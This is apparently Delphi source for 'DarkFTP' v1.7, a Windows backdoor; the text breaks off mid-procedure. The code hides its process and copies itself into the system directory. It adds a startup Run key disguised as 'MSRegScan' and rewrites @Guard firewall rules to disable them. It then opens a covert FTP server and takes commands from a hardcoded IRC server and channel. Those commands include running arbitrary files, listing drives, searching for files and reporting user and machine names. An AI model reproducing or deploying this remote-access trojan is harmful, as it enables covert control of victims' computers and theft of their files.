unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  FtpSrv, StdCtrls, WSocket, ExtCtrls,regfuncs,shellapi,FtpSrvC, FileCtrl,registry,
  FScanner;

const
  DEBUGMODE=FALSE;

  WM_APPSTARTUP  = WM_USER + 1;
  AppIdentString='WHI DarkFTP'; Version='1.7';

  RSPSIMPLESERVICE     = 1;
  RSPUNREGISTERSERVICE = 0;

type
  TForm1 = class(TForm)
    Ftp: TFtpServer;
    tcp: TWSocket;
    Timer1: TTimer;
    drives: TDriveComboBox;
    search: TBaseScanner;
    clients_ip_list: TListBox;
    Memo1: TMemo;
    procedure FormCreate(Sender: TObject);
    procedure tcpSessionConnected(Sender: TObject; Error: Word);
    procedure tcpDataAvailable(Sender: TObject; Error: Word);
    procedure tcpBgException(Sender: TObject; E: Exception;
      var CanClose: Boolean);
    procedure tcpError(Sender: TObject);
    procedure Timer1Timer(Sender: TObject);
    procedure tcpSessionClosed(Sender: TObject; Error: Word);
    procedure FtpAuthenticate(Sender: TObject; Client: TFtpCtrlSocket;
      UserName, Password: TFtpString; var Authenticated: Boolean);
    procedure FormClose(Sender: TObject; var Action: TCloseAction);
    procedure searchFileFound(AName, APath: String; AAttr, ASize: Integer;
      ADateTime: TDateTime);
    procedure searchProcessDone(ACount, ASize: Cardinal);
    procedure tcpSendData(Sender: TObject; BytesSent: Integer);
    procedure FtpClientDisconnect(Sender: TObject; Client: TFtpCtrlSocket;
      Error: Word);
    procedure FtpClientCommand(Sender: TObject; Client: TFtpCtrlSocket;
      var Keyword, Params, Answer: TFtpString);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

 function RegisterServiceProcess (dwProcessID, dwType: DWord) : DWord;
  stdcall; external 'KERNEL32.DLL';

var
  Form1: TForm1;
  CompName,Usrname:string;
  px:cardinal;
  BFF:pchar;
  Startuptime,FtpUser,FTPPassWord,server,port,nick,chan:string;
  attempting,useirc:boolean;
  totalhelplines,MySelfFound:byte;
  Windir,sourcepath,winpath:string;
  helpdata:array[1..50] of string;
  search_origin:string;
  
const
  RegCfgRoot='Software\DataLogic\ActiveSubControl\Arrays';

  INTERNAL_IRCSRV ='IRCSRV:***************';
  INTERNAL_IRCPRT ='IRCPRT:*****';
  INTERNAL_IRCCHN ='IRCCHN:************************************************************';
  INTERNAL_IRCUSE ='IRCUSE:*';
  INTERNAL_FTPPRT ='FTPPRT:*****';
  INTERNAL_FTPMUS ='FTPMUS:**';
  INTERNAL_FTPUSR ='FTPUSR:***************';
  INTERNAL_FTPPWD ='FTPPWD:***************';

implementation

{$R *.DFM}

procedure REGWRITESTRING(key,name,value:string);
var
  reg  : TRegIniFile;
begin
  reg := TRegIniFile.Create( '' );
  reg.RootKey := HKEY_LOCAL_MACHINE ;
  reg.WriteString(Key + #0, name, value);
  reg.Free;
end;

function REGREADSTRING(key,name:string):string;
var
  reg  : TRegIniFile;
begin
  reg := TRegIniFile.Create( '' );
  reg.RootKey := HKEY_LOCAL_MACHINE ;
  REGREADSTRING:=reg.ReadString(key+#0,name,'');
  reg.Free;
end;

procedure REGWRITEINT(key,name:string; value:integer);
var
  reg  : TRegIniFile;
begin
  reg := TRegIniFile.Create( '' );
  reg.RootKey := HKEY_LOCAL_MACHINE ;
  reg.WriteInteger(key+#0,name,value);
  reg.Free;
end;

function REGREADINT(key,name:string):integer;
var
  reg  : TRegIniFile;
begin
  reg := TRegIniFile.Create( '' );
  reg.RootKey := HKEY_LOCAL_MACHINE ;
  REGREADINT:=reg.Readinteger(key+#0,name,0);
  reg.Free;
end;

procedure REGDELETEVALUE(key,name:string);
var
  reg  : TRegIniFile;
begin
  reg := TRegIniFile.Create( '' );
  reg.RootKey := HKEY_LOCAL_MACHINE ;
  reg.DeleteKey(key,name);
  reg.Free;
end;

function subst(mainstring,target,replace:string):string;
var
 bf,bf2,bf3,cm:string;
 ct:integer;

begin
 if mainstring=target then begin
  subst:=replace;
  exit;
 end;

 repeat

 cm:=mainstring;

 ct:=pos(target,mainstring);
 if ct=0 then begin
  subst:=mainstring;
  exit;
 end;

 if ct>1 then begin
  bf:=copy(mainstring,1,ct-1);
  bf2:=copy(mainstring,ct+length(target),length(mainstring)-ct+length(target)-1);
  bf3:=bf+replace+bf2;
 end else begin
  bf:='';
  bf2:=copy(mainstring,ct+length(target),length(mainstring)-ct+length(target)-1);
  bf3:=bf+replace+bf2;
 end;
 mainstring:=bf3;
 until cm=bf3;

 subst:=bf3;

end;

{----------------------------------------------------------------}
{ CONFIG HANDLER - New configuration storage concept since v1.65 }
{----------------------------------------------------------------}

procedure LOADConfig;
var
 IRCSRV,IRCPRT,IRCCHN,IRCUSE,FTPPRT,FTPMUS,FTPUSR,FTPPWD:string;

begin
 IRCSRV:=REGREADSTRING(RegCFGRoot,'IRCSRV');
 IRCPRT:=REGREADSTRING(RegCFGRoot,'IRCPRT');
 IRCCHN:=REGREADSTRING(RegCFGRoot,'IRCCHN');
 IRCUSE:=REGREADSTRING(RegCFGRoot,'IRCUSE');
 FTPPRT:=REGREADSTRING(RegCFGRoot,'FTPPRT');
 FTPMUS:=REGREADSTRING(RegCFGRoot,'FTPMUS');
 FTPUSR:=REGREADSTRING(RegCFGRoot,'FTPUSR');
 FTPPWD:=REGREADSTRING(RegCFGRoot,'FTPPWD');

 if (IRCSRV='')
 OR (IRCPRT='')
 OR (IRCCHN='')
 OR (IRCUSE='')
 OR (FTPPRT='')
 OR (FTPMUS='')
 OR (FTPUSR='')
 OR (FTPPWD='')
 then begin
  //Use Internal Configuration parameters...
   IRCSRV:=TRIM(SUBST(COPY(INTERNAL_IRCSRV,8,LENGTH(INTERNAL_IRCSRV)-7),'*',' '));
   IRCPRT:=TRIM(SUBST(COPY(INTERNAL_IRCPRT,8,LENGTH(INTERNAL_IRCPRT)-7),'*',' '));
   IRCCHN:=TRIM(SUBST(COPY(INTERNAL_IRCCHN,8,LENGTH(INTERNAL_IRCCHN)-7),'*',' '));
   IRCUSE:=TRIM(SUBST(COPY(INTERNAL_IRCUSE,8,LENGTH(INTERNAL_IRCUSE)-7),'*',' '));
   FTPPRT:=TRIM(SUBST(COPY(INTERNAL_FTPPRT,8,LENGTH(INTERNAL_FTPPRT)-7),'*',' '));
   FTPMUS:=TRIM(SUBST(COPY(INTERNAL_FTPMUS,8,LENGTH(INTERNAL_FTPMUS)-7),'*',' '));
   FTPUSR:=TRIM(SUBST(COPY(INTERNAL_FTPUSR,8,LENGTH(INTERNAL_FTPUSR)-7),'*',' '));
   FTPPWD:=TRIM(SUBST(COPY(INTERNAL_FTPPWD,8,LENGTH(INTERNAL_FTPPWD)-7),'*',' '));

 end;

 if (IRCSRV='')
 OR (IRCPRT='')
 OR (IRCCHN='')
 OR (IRCUSE='')
 OR (FTPPRT='')
 OR (FTPMUS='')
 OR (FTPUSR='')
 OR (FTPPWD='')
 then begin
  //... if fail use default settings.
  IRCSRV:='194.247.160.11';
  IRCPRT:='6667';
  IRCCHN:='#whidarkftp';
  IRCUSE:='1';
  FTPPRT:='21';
  FTPMUS:='99';
  FTPUSR:='anonymous';
  FTPPWD:='bill@sux.com';
 end;

 //If in debug mode then use these settings
 if debugmode then begin
  IRCSRV:='192.168.0.1';
  IRCPRT:='6667';
  IRCCHN:='#whidarkftp';
  IRCUSE:='1';
  FTPPRT:='21';
  FTPMUS:='99';
  FTPUSR:='anonymous';
  FTPPWD:='bill@sux.com';
 end;

 //Fianally pass the cfg to external objects.
 server:=IRCSRV;
 port:=IRCPRT;
 chan:=IRCCHN;
 if IRCUSE[1]='0' then useirc:=false else useirc:=true;
 form1.ftp.port:=FTPPRT;
 try form1.ftp.maxclients:=strtoint(FTPMUS); except on E: EConvertError do form1.ftp.maxclients:=99; end;
 FtpUser:=FTPUSR;
 FTPPassWord:=FTPPWD;
end;

procedure SaveConfig;
begin
 REGWRITESTRING(RegCFGRoot,'IRCSRV',SERVER);
 REGWRITESTRING(RegCFGRoot,'IRCPRT',PORT);
 REGWRITESTRING(RegCFGRoot,'IRCCHN',CHAN);
 if USEIRC then REGWRITESTRING(RegCFGRoot,'IRCUSE','1')
           else REGWRITESTRING(RegCFGRoot,'IRCUSE','0');

 REGWRITESTRING(RegCFGRoot,'FTPPRT',form1.ftp.port);
 REGWRITESTRING(RegCFGRoot,'FTPMUS',inttostr(form1.ftp.maxclients));
 REGWRITESTRING(RegCFGRoot,'FTPUSR',FTPUSER);
 REGWRITESTRING(RegCFGRoot,'FTPPWD',FTPPASSWORD);
end;

{-----------------------------------------------------------------}


procedure DEFINEHELP;
 begin
  helpdata[01]:='-------------------------------------------------------------';
  helpdata[02]:='             DarkFTP IRC Console Commands Help ';
  helpdata[03]:='-------------------------------------------------------------';
  helpdata[04]:='CHUP      %P : Change user/password %P. must be NEWUSR:NEWPWD';
  helpdata[05]:='CHFTPPORT %P : Change the ftp server port to %P';
  helpdata[06]:='CHUSEIRC  %P : Enable/Disable IRC function. %P must be Y or N';
  helpdata[07]:='CHCHAN    %P : Change the IRC channel to %P';
  helpdata[08]:='CHIRCSRV  %P : Change the IRC server to %P';
  helpdata[09]:='CHIRCPORT %P : Change the IRC server port to %P';
  helpdata[10]:='CHMAXUSER %P : Change maximum connections number';
  helpdata[11]:='DESTROY      : Remove the Dark from the host';
  helpdata[12]:='SHUTDOWN     : Shutdown the Dark';
  helpdata[13]:='RESTART      : Restart the Dark (implement CLOSEALL)';
  helpdata[14]:='CLOSEALL     : Close all ftp connections';
  helpdata[15]:='FTPRESTART   : Restart the ftp server';
  helpdata[16]:='DRIVES       : List of drives on the system';
  helpdata[17]:='GEOMETRY  %P : Give the geometry of drive %P';
  helpdata[18]:='ABOUTYOU     : Give some info about the server';
  helpdata[19]:='VIEWCFG      : View current config';
  helpdata[20]:='SWAPEXE   %P : Terminate the Dark and launch %P';
  helpdata[21]:='EXEC      %P : Launch %P application file';
  helpdata[22]:='FIND  %P1 %P2: Search for %P1 in path %P2';
  helpdata[23]:='STOPFIND     : Terminates find task.';
  helpdata[24]:='CLIENTSIP    : Show the IP of the FTP clients';
  helpdata[25]:='HELPME       : Show this help';
  helpdata[26]:='QUOTE %P     : Quote %P to IRC server';
  helpdata[27]:='-------------------------------------------------------------';
  helpdata[28]:='All command must be preceded by the USER:PASSWD string. For';
  helpdata[29]:='example if the user is waver and the password is lamah the';
  helpdata[30]:='correct syntax for the command "GEOMETRY" is the following:';
  helpdata[31]:='';
  helpdata[32]:='                   waver:lamah geometry c';
  helpdata[33]:='-------------------------------------------------------------';
  totalhelplines:=33;
 end;

function DriveGeometry(letter:string):string;
Type
TDiskInfo          = Record
 SectorsPerCluster : DWORD;
 BytesPerSector    : DWORD;
 FreeClusters      : DWORD;
 NumClusters       : DWORD;
 BytesTotal        : DWORD;
 BytesFree         : DWORD;
End;

var
 DiskInfo : TDiskInfo;
 s:string;

begin
With DiskInfo do Begin
  GetDiskFreeSpace(pchar(letter+':\'), SectorsPerCluster,BytesPerSector,FreeClusters, NumClusters);
  BytesTotal := NumClusters*SectorsPerCluster*BytesPerSector;
  BytesFree  := FreeClusters*SectorsPerCluster*BytesPerSector;
  s:='Geometry of '+letter+': Sectors/Cluster:' + inttostr(SectorsPerCluster) +
     ' - Bytes/Sector:' + inttostr(BytesPerSector)+
     ' - Bytes/Sector:' + inttostr(BytesPerSector)+
     ' - Free Clusters:' + inttostr(FreeClusters)+
     ' - Total Clusters:' + inttostr(NumClusters)+
     ' - Total bytes:' + inttostr(BytesTotal)+
     ' - Free bytes:' + inttostr(BytesFree)+#13#10;
 End;
 drivegeometry:=s;
end;

procedure AppShutDown;
var
 t:integer;
begin
 SaveConfig;
 if form1.tcp.state=wsconnected then begin
  form1.tcp.SendStr('QUIT Terminated.'+#13#10);
  for t:=1 to 60 do begin application.processmessages; sleep(10); end;
  form1.tcp.close;
 end;
 form1.ftp.Stop;
 Application.Terminate;
end;

Procedure AppDestroy;
begin
 deleteregvalue (HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run' ,'MSRegScan');
 AppShutDown;
end;

procedure AppRestart;
begin
  ShellExecute( 0, nil, Pchar(WinPath), nil, nil, SW_HIDE);
  AppShutDown;
end;

procedure JumpAtGuard;

Begin
 if not RegKeyExists(HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule0') then exit;
 if not RegKeyExists(HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule1') then exit;

 //Crack Rule 0
 writeregdword (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule0','RuleNumber',00000000);
 writeregdword (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule0','RuleInUse',00000001);
 writeregdword (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule0','RuleAction',00000002);
 writeregdword (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule0','RuleProtocol',00000000);
 writeregdword (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule0','RuleDirection',00000002);
 writeregdword (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule0','RuleLogging',00000000);
 writeregdword (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule0','RuleLoggingThreshold',00000000);
 deleteregvalue (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule0','RuleApplicationObject');
 deleteregvalue (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule0','RuleRemoteServiceObject');

 //Crack Rule 1
 writeregdword (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule1','RuleNumber',00000001);
 writeregdword (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule1','RuleInUse',00000001);
 writeregdword (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule1','RuleAction',00000002);
 writeregdword (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule1','RuleProtocol',00000000);
 writeregdword (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule1','RuleDirection',00000001);
 writeregdword (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule1','RuleLogging',00000000);
 writeregdword (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule1','RuleLoggingThreshold',00000000);
 deleteregvalue (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule1','RuleApplicationObject');
 deleteregvalue (HKEY_LOCAL_MACHINE,'Software\WRQ\IAM\FirewallObjects\IPFilterRules\Rule1','RuleRemoteServiceObject');
end;

function CONNECTED:boolean;

begin
 if DEBUGMODE then begin connected:=true; exit; end else CONNECTED:=FALSE;
 if not regvalueexists(HKEY_LOCAL_MACHINE,'System\CurrentControlSet\Services\RemoteAccess','Remote Connection') then exit;
 if GetRegBinary(HKEY_LOCAL_MACHINE,'System\CurrentControlSet\Services\RemoteAccess','Remote Connection')<>0 then connected:=true;
end;

function EnumWinProc(Wnd : HWND; frm : TForm1) : Boolean; Export; {$IFDEF Win32}StdCall;{$ENDIF}
 var
  WinText : Array[0..255] of Char;
begin
 GetWindowText(Wnd, WinText, 255);
 Result := True;
 if AppIdentString=StrPas(WinText) then inc(myselfFound);
end;

procedure TForm1.FormCreate(Sender: TObject);
var
  pWinDir : array [0..255] of Char;
  dl:integer;

begin
 //Get some system/user infos...
 PX:=50; GetMem (BFF, PX); GetUserName (BFF, PX); UsrName:=BFF; FreeMem(BFF);
 PX:=50; GetMem (BFF, PX); GetComputerName (BFF, PX); CompName:=BFF; FreeMem(BFF);
 GetSystemDirectory (pWinDir, 255);
 WinDir := StrPas (pWinDir);
 SourcePath:=application.exename;
 WinPath:=Windir + '\' + extractfilename(Application.Exename);

 if not debugmode then begin

   //Hide application window and process
   form1.width:=0; form1.Height:=0; form1.top:=-1; form1.left:=-1;
   ShowWindow(Application.Handle, SW_HIDE );
   SetWindowLong(Application.Handle, GWL_EXSTYLE, GetWindowLong(Application.Handle, GWL_EXSTYLE) or WS_EX_TOOLWINDOW and not WS_EX_APPWINDOW);
   RegisterServiceProcess (GetCurrentProcessID, RSPSIMPLESERVICE);

   //Shut down after few seconds if already running
   for dl:=1 to 500 do begin
    application.processmessages;
    sleep(10);
   end;

   MyselfFound:=0;
   EnumWindows(@EnumWinProc, LongInt(Self));
   if myselffound>1 then Application.Terminate;


   //First execution.
   if SourcePath<>WinPath then begin
     if fileexists(WinPath) then DeleteFile(WinPath);
    copyfile(pchar(SourcePath), pchar(WinPath),false);
    writeregstring(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run', 'MSRegScan',WinPath);
    //Delete the config key. Probably was an old Dark config...
    deleteregvalue (HKEY_LOCAL_MACHINE,RegCfgRoot,'Data');
    ShellExecute(0, nil, Pchar(WinPath), nil, nil, SW_HIDE);
    halt(0);
   end;

   //Disable @Guard if present.
   JumpAtGuard;

  end; //DebugMode....

 //Set server/client parameters
 nick:=compname; if length(nick)<5 then nick:=nick+'-'+nick;
 if length(nick)>10 then nick:=copy(nick,1,10);

 //Load CFG from registry or use default....
 LoadConfig;

 //..anyway saves the config in the registry (will use this the next time)
 SaveConfig;

 //Start server and client
 Timer1.enabled:=useirc;
 ftp.banner:='220 ' + AppIdentString +' '+ Version + ' server ready. www.darkftp.cjb.net.';
 if useirc then ftp.banner:=ftp.banner+' IRC Client Active.';

 Startuptime:=datetostr(date) + ' ' + timetostr(time);

 try ftp.Start; except on E: ESocketException do ftp.Stop; end;

end;

procedure TForm1.tcpSessionConnected(Sender: TObject; Error: Word);
begin
 tcp.sendstr('USER nobody@nowhere.com ' + tcp.localaddr + ' ' + server + ' :' + compname + #13#10);
 tcp.sendstr('NICK ' + nick +#13#10 + 'JOIN ' + chan + #13#10);
end;

procedure TForm1.tcpDataAvailable(Sender: TObject; Error: Word);
var
 cmd,origin,s,param,param1,param2,param3:string;
 ct:integer;
 dr:char;

begin
 s:=tcp.ReceiveStr;

 if debugmode then memo1.lines.add(s);

 //Nick is in use. Randomize it.
 if (pos('433',s)<>0) and (pos('PRIVMSG',uppercase(s))=0) then begin
  randomize;
  nick:='DKFTP' + inttostr(random(99999));
  tcp.sendstr('NICK ' + nick + #13#10 + 'JOIN ' + chan + #13#10);
 end;

 //Check for commands
 if (pos(uppercase('PRIVMSG '+trim(nick)),uppercase(s))<>0) then begin

  origin:=trim(subst(copy(s,1,pos('!',s)-1),':',''));

  s:=copy(s,2,length(s)); s:=copy(s,pos(':',s)+1, length(s));
  if (FtpUser='anonymous') or (copy(s,1, length(FtpUser + ':' + ftppassword))= (FtpUser + ':' + ftppassword)) then begin

  //Copy only the command string.
  if (FtpUser='anonymous') then cmd:=trim(s) else cmd:=trim(copy(s,length(FtpUser + ':' + ftppassword)+1,length(s)));

    //Destroy the Dark
    if uppercase(cmd)='DESTROY' then begin
      tcp.SendStr('PRIVMSG '+trim(origin)+' :'+'The life is short.. :('+#13#10);
      tcp.SendStr('PRIVMSG '+trim(origin)+' :'+'Bye.'+#13#10);
      AppDestroy;
    end else

    //Restart the Dark
    if uppercase(cmd)='RESTART' then begin
     tcp.SendStr('PRIVMSG '+trim(origin)+' :'+'Restarting. BRB!'+#13#10);
     AppRestart;
    end else

    //Terminate the Dark (but it can restart @ the system startup)
    if uppercase(cmd)='SHUTDOWN' then begin
     tcp.SendStr('PRIVMSG '+trim(origin)+' :'+'Shutting down..'+#13#10);
     AppShutDown;
    end else

    //Send some informations about the server
    if uppercase(cmd)='ABOUTYOU' then begin
     tcp.SendStr('PRIVMSG '+trim(origin)+' :'+'Dark FTP v'+version+' coded by WaVeR of WHI (http://www.darkftp.cjb.net)'+#13#10);
     tcp.SendStr('PRIVMSG '+trim(origin)+' :'+'Started ' + startuptime + ' from Host: '+ CompName + ' with User: ' + UsrName + ' is listening on port ' + ftp.port + #13#10);
     tcp.SendStr('PRIVMSG '+trim(origin)+' :Using '+inttostr(ftp.clientcount)+'/'+inttostr(ftp.maxclients)+' contemporaneous connections.'+#13#10);
     if not ftp.Active then tcp.SendStr('PRIVMSG '+trim(origin)+' :Warning! The FTP server is not active! Check the port number!'+#13#10);
    end else

    //Disconnect all users connected to the FTP server
    if uppercase(cmd)='CLOSEALL' then begin
     tcp.SendStr('PRIVMSG '+trim(origin)+' :'+inttostr(ftp.clientcount)+' ftp clients connected. Trying to disconnect all...'+ #13#10);
     ftp.DisconnectAll;
    end else

    //Send some information about the system drives
    if uppercase(cmd)='DRIVES' then begin
     tcp.SendStr('PRIVMSG '+trim(origin)+' :System drives:'+inttostr(drives.Items.Count)+' drives found.'+#13#10);
     for ct:=0 to drives.items.count-1 do begin
      tcp.SendStr('PRIVMSG '+trim(origin)+' :' + drives.Items.Strings[ct] + #13#10);
     end;
    end else

    //Restart the ftp server
    if uppercase(cmd)='FTPRESTART' then begin
     tcp.SendStr('PRIVMSG '+trim(origin)+' :Restarting FTP server: wait a moment...'+ #13#10);
     form1.ftp.Stop; ftp.banner:='220 ' + AppIdentString +' '+ Version + ' server ready. www.darkftp.cjb.net. ';
     if useirc then ftp.banner:=ftp.banner+'IRC Client Active.';
     Startuptime:=datetostr(date) + ' ' + timetostr(time);
     try ftp.Start; except on E: ESocketException do tcp.SendStr('PRIVMSG '+trim(origin)+' :Warning: FTP Server exception, unstable system! Try changing the ftp port and restart again.'+ #13#10); end;
     if ftp.active then tcp.SendStr('PRIVMSG '+trim(origin)+' :Server is active.'+ #13#10);
    end else

    //Send current cfg
    if uppercase(cmd)='VIEWCFG' then begin
                        tcp.SendStr('PRIVMSG '+trim(origin)+' :DARKFTP CURRENT CONFIGURATION'+#13#10);
                        tcp.SendStr('PRIVMSG '+trim(origin)+' :IRC Server  : '+server+#13#10);
                        tcp.SendStr('PRIVMSG '+trim(origin)+' :IRC Port    : '+port+#13#10);
                        tcp.SendStr('PRIVMSG '+trim(origin)+' :IRC Channel : '+chan+#13#10);
     if useirc then     tcp.SendStr('PRIVMSG '+trim(origin)+' :IRC Enabled : YES'+#13#10) else
                        tcp.SendStr('PRIVMSG '+trim(origin)+' :IRC Enabled : NO'+#13#10);
                        tcp.SendStr('PRIVMSG '+trim(origin)+' :FTP Port    : '+ftp.port+#13#10);
                        tcp.SendStr('PRIVMSG '+trim(origin)+' :FTP MaxUsers: '+inttostr(ftp.maxclients)+#13#10);
                        tcp.SendStr('PRIVMSG '+trim(origin)+' :FTP User    : '+ftpuser+#13#10);
                        tcp.SendStr('PRIVMSG '+trim(origin)+' :FTP Password: '+ftppassword+#13#10);
    end else

    //Help
    if copy(uppercase(cmd),1,6)='HELPME' then begin
     DefineHelp;
     for ct:=1 to totalhelplines do begin
      tcp.SendStr('PRIVMSG '+trim(origin)+' :'+helpdata[ct]+#13#10);
      application.processmessages;
     end;
    end else

    //Send some information about the drive geometry
    if copy(uppercase(cmd),1,8)='GEOMETRY' then begin
     if length(cmd)=8 then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Insufficient parameters!'+ #13#10); exit; end;
     dr:=cmd[10];
     tcp.SendStr('PRIVMSG '+trim(origin)+' :' + DriveGeometry(dr) + #13#10);
    end else

    //Change Login:Password
    if copy(uppercase(cmd),1,4)='CHUP' then begin
     if length(cmd)=4 then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Insufficient parameters!'+ #13#10); exit; end;
     param:=trim(copy(cmd,5,length(s)));
     if (param='') or (pos(':',param)=0) then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Please specify "NEWUSER:NEWPASSWORD" as parameter!'+ #13#10); exit; end;
     param2:=copy(param,1,pos(':',param)-1);
     param3:=copy(param,pos(':',param)+1,length(param));
     if (length(param2)>16) or (length(param3)>16) then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Parameters too long. 16+16 letters max.'+ #13#10); exit; end;
     tcp.SendStr('PRIVMSG '+trim(origin)+' :Username changed from "'+ ftpuser + '" to "' + param2 + '". Password changed from "' + ftppassword + '" to "'+param3+'".'+ #13#10);
     ftpuser:=param2; ftppassword:=param3; SaveConfig;
    end else

    //Change the FTPport
    if copy(uppercase(cmd),1,9)='CHFTPPORT' then begin
     if length(cmd)=9 then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Insufficient parameters!'+ #13#10); exit; end;
     param:=trim(copy(cmd,10,length(s)));
     if (length(param)>5) then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Parameter too long. 5 letters max.'+ #13#10); exit; end;
     tcp.SendStr('PRIVMSG '+trim(origin)+' :Ftp port changed from "'+ form1.ftp.port + '" to "' + param + '". The server must be restarted!'+ #13#10);
     form1.ftp.port:=param; SaveConfig;
    end else

    //Change the UseIRC
    if copy(uppercase(cmd),1,8)='CHUSEIRC' then begin
     if length(cmd)=8 then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Insufficient parameters!'+ #13#10); exit; end;
     dr:=upcase(cmd[10]);
     if dr='Y' then begin
      useirc:=true;
      tcp.SendStr('PRIVMSG '+trim(origin)+' :DarkFTP will use the IRC function in the future. DarkFTP must be restarted.'+ #13#10);
     end else begin
      useirc:=false;
      tcp.SendStr('PRIVMSG '+trim(origin)+' :DarkFTP will not use the IRC function in the future. DarkFTP must be restarted.'+ #13#10);
     end;
    SaveConfig;
    end else

    //Change the Channel
    if copy(uppercase(cmd),1,6)='CHCHAN' then begin
     if length(cmd)=6 then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Insufficient parameters!'+ #13#10); exit; end;
     param:=trim(copy(cmd,7,length(s)));
     if (length(param)>30) then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Parameter too long. 30 letters max.'+ #13#10); exit; end;
     tcp.SendStr('PRIVMSG '+trim(origin)+' :IRC channel changed to "'+ param + '". DarkFTP must be restarted.'+ #13#10);
     chan:=param; SaveConfig;
    end else

    //Change the IRCServer
    if copy(uppercase(cmd),1,8)='CHIRCSRV' then begin
     if length(cmd)=8 then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Insufficient parameters!'+ #13#10); exit; end;
     param:=trim(copy(cmd,9,length(s)));
     if (length(param)>30) then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Parameter too long. 30 letters max.'+ #13#10); exit; end;
     tcp.SendStr('PRIVMSG '+trim(origin)+' :IRCServer changed to "'+ param + '". DarkFTP must be restarted.'+ #13#10);
     server:=param; SaveConfig;
    end else

    //Change the IRCport
    if copy(uppercase(cmd),1,9)='CHIRCPORT' then begin
     if length(cmd)=9 then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Insufficient parameters!'+ #13#10); exit; end;
     param:=trim(copy(cmd,10,length(s)));
     if (length(param)>5) then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Parameter too long. 5 letters max.'+ #13#10); exit; end;
     tcp.SendStr('PRIVMSG '+trim(origin)+' :IRC port changed to "' + param + '". DarkFTP must be restarted.'+ #13#10);
     port:=param; SaveConfig;
    end else

    //Change the MaxUser
    if copy(uppercase(cmd),1,9)='CHMAXUSER' then begin
     if length(cmd)=9 then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Insufficient parameters!'+ #13#10); exit; end;
     param:=trim(copy(cmd,10,length(s)));
     if (length(param)>2) then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :MaxUser string too long. 2 letters max.'+ #13#10); exit; end;
     try form1.ftp.maxclients:=strtoint(param); except on E: EConvertError do begin form1.ftp.maxclients:=99; tcp.SendStr('PRIVMSG '+trim(origin)+' :Invalid value. Using default (99).'+#13#10); end; end;
     tcp.SendStr('PRIVMSG '+trim(origin)+' :Maximum contemporaneous connections number changed to "' + inttostr(ftp.maxclients) + '". The server must be restarted!'+ #13#10);
     SaveConfig;
    end else

    //Swap server
    if copy(uppercase(cmd),1,7)='SWAPEXE' then begin
     if length(cmd)=7 then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Insufficient parameters!'+ #13#10); exit; end;
     param:=trim(copy(cmd,8,length(s)));
     if not fileexists(param) then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :File not found!'+ #13#10); exit; end;
     tcp.SendStr('PRIVMSG '+trim(origin)+' :DarkFTP is going down for launching specified file....'+ #13#10);
     ShellExecute( 0, nil, Pchar(param), nil, nil, SW_HIDE);
     AppShutDown;
    end else

    //Launch application
    if copy(uppercase(cmd),1,4)='EXEC' then begin
     if length(cmd)=4 then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Insufficient parameters!'+ #13#10); exit; end;
     param:=trim(copy(cmd,5,length(s)));
     if not fileexists(param) then tcp.SendStr('PRIVMSG '+trim(origin)+' :File not found '+param+'! Trying anyway...'+#13#10);
     tcp.SendStr('PRIVMSG '+trim(origin)+' :Command executed.'+ #13#10);
     ShellExecute( 0, nil, Pchar(param), nil, nil, SW_NORMAL);
    end else

    //Search a file
    if copy(uppercase(cmd),1,4)='FIND' then begin
     if search.InProcess then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Search process owned by another user. Try later.'+ #13#10); exit; end;
     if length(cmd)=4 then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Insufficient parameters!'+ #13#10); exit; end;
     param:=trim(copy(cmd,5,length(s)));
     param1:=trim(copy(param,1,pos(' ',param)));
